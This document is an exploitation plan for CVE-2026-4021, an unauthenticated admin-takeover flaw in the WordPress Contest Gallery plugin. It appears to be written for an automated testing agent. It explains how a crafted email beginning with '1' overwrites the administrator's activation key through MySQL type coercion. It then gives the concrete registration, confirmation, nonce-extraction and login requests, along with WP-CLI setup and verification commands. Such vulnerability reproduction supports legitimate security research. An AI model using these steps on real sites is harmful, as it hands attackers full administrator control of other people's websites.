Exploitation Research Plan: CVE-2026-4021 - Contest Gallery Admin Takeover

1. Vulnerability Summary

The Contest Gallery plugin (up to 28.1.5) contains a critical improper authentication vulnerability. The flaw exists in the email confirmation handler (users-registry-check-after-email-or-pin-confirmation.php), where a user-provided email string is used in a database query's WHERE ID = %s clause.

Due to MySQL's integer coercion, a string like 1attacker@example.com compared against an integer ID column is treated as 1. When the optional setting RegMailOptional=1 is enabled, an unauthenticated attacker can register an account with a specially crafted email starting with the target administrator's ID (typically 1). By triggering the email confirmation flow, the plugin inadvertently updates the user_activation_key for the administrator. The attacker can then use this key with the unauthenticated AJAX action post_cg1l_login_user_by_key to log in as the administrator.

2. Attack Vector Analysis

• Target Endpoint: admin-ajax.php
• Vulnerable Action 1 (Trigger): Registration/Confirmation flow (likely involves post_cg_registry_save_user_data or a direct GET request to a confirmation page).
• Vulnerable Action 2 (Login): wp_ajax_nopriv_post_cg1l_login_user_by_key.
• Payload Parameter: cglKey (The activation key) and registration email (e.g., 1[random]@example.com).
• Authentication Level: Unauthenticated.
• Preconditions:
  • RegMailOptional=1 must be enabled in plugin settings.
  • A registration form must be active (usually via shortcode [cg_users_reg]).

3. Code Flow

1. Registration: The attacker submits a registration form via post_cg_registry_save_user_data.
2. Confirmation Trigger: The attacker accesses the confirmation link. The plugin loads users-registry-check-after-email-or-pin-confirmation.php.
3. SQL Injection/Type Confusion: The confirmation code performs an update:
   UPDATE wp_users SET user_activation_key = %s WHERE ID = %s
   The second parameter is the user's email (e.g., 1attacker@example.com). MySQL coerces this to 1.
4. Key Overwrite: The administrator's (ID 1) user_activation_key is now set to a value known or controlled by the attacker.
5. Authentication Bypass:
   • The attacker calls post_cg1l_login_user_by_key in ajax-functions-frontend.php.
   • The function verifies the provided cglKey against the users table:

     $userRow = $wpdb->get_row($wpdb->prepare("SELECT * FROM {$wpdb->users} WHERE user_activation_key = %s", $activation_key));
     

   • Since the Admin's key was overwritten, the query returns the Admin user object.
   • The plugin proceeds to call wp_set_auth_cookie($userRow->ID) (inferred login logic).

4. Nonce Acquisition Strategy

The post_cg1l_login_user_by_key function calls cg_check_frontend_nonce(), which expects a nonce for the action cg1l_action.

1. Identify Shortcode: The registration and login forms are typically rendered via shortcodes like [cg_users_reg] or [cg_users_login].
2. Create Page: Create a temporary page to load the plugin's environment.

   wp post create --post_type=page --post_status=publish --post_title="Login" --post_content='[cg_users_login]'
   

3. Extract Nonce: Navigate to the page and extract the nonce from the global JavaScript object cgJsClass.
   • JS Variable: window.cgJsClass.gallery.vars.currentCgNonce (based on post_cg1l_current_frontend_nonce in ajax-functions-frontend.php).
   • Tool: browser_eval("window.cgJsClass.gallery.vars.currentCgNonce").

5. Exploitation Strategy

Step 1: Pre-requisite Configuration

Ensure the vulnerable setting is enabled via WP-CLI:

wp option update RegMailOptional 1

Step 2: Extract Nonce and Gallery ID

1. Create a page with a gallery/login shortcode.
2. Visit the page and identify a valid Gallery ID (gid).
3. Extract the cg1l_action nonce.

Step 3: Registration and Key Hijack

Register an account with an email starting with 1.

• Request: POST /wp-admin/admin-ajax.php
• Parameters:
  • action: post_cg_registry_save_user_data (or the specific registration handler found in source).
  • email: 1poc@example.test
  • gid: [GALLERY_ID]
  • _ajax_nonce: [NONCE]

Trigger the confirmation. The confirmation logic usually expects a key generated during registration. If RegMailOptional=1, the key might be predictable or returned in the response.

• Request: GET /?cg_verify_email=1&user_email=1poc@example.test&key=[OBTAINED_KEY]

Step 4: Login as Admin

Use the activation key to authenticate as the administrator (ID 1).

• Request: POST /wp-admin/admin-ajax.php
• Body (URL-encoded):

  action=post_cg1l_login_user_by_key&cgl_gid=[GALLERY_ID]&cglKey=[OBTAINED_KEY]&_ajax_nonce=[NONCE]
  

6. Test Data Setup

1. Target User: Ensure a user with ID 1 exists (default admin).
2. Plugin Setup:

   wp plugin activate contest-gallery
   wp option update RegMailOptional 1
   # Create a gallery to obtain a valid GID
   wp eval "global \$wpdb; \$wpdb->insert(\"{\$wpdb->prefix}contest_gal1ery_options\", ['GalleryName' => 'Exploit']);"
   GID=$(wp db query "SELECT id FROM wp_contest_gal1ery_options ORDER BY id DESC LIMIT 1" --silent --skip-column-names)
   wp post create --post_type=page --post_status=publish --post_content="[cg_gallery id=$GID]"
   

7. Expected Results

• The confirmation request should complete successfully.
• The post_cg1l_login_user_by_key request should return a successful login response (likely a redirect or a JSON success message).
• The response headers should contain Set-Cookie for a logged-in Administrator session.

8. Verification Steps

1. Check Key Overwrite:

   wp db query "SELECT ID, user_login, user_activation_key FROM wp_users WHERE ID = 1"
   

   Verify the user_activation_key matches the one used in the exploit.
2. Check Authentication:
   Use the returned cookies from the http_request tool to access /wp-admin/ and verify access to the dashboard.

9. Alternative Approaches

• Direct Key Discovery: If registration returns the key directly in the AJAX response or the confirmation link is visible in the wp_options or a log table (like contest_gal1ery_logs if it exists), skip email interception.
• Gallery ID 9999999: Note the special logic in post_cg_galleries_show_cg_gallery where gidToShow=9999999 fetches the latest gallery ID. This might be useful for automated discovery of the gid.
• Registration Form Fields: If registration fails, verify required fields via wp db query "SELECT * FROM wp_contest_gal1ery_create_user_form WHERE GalleryID = $GID".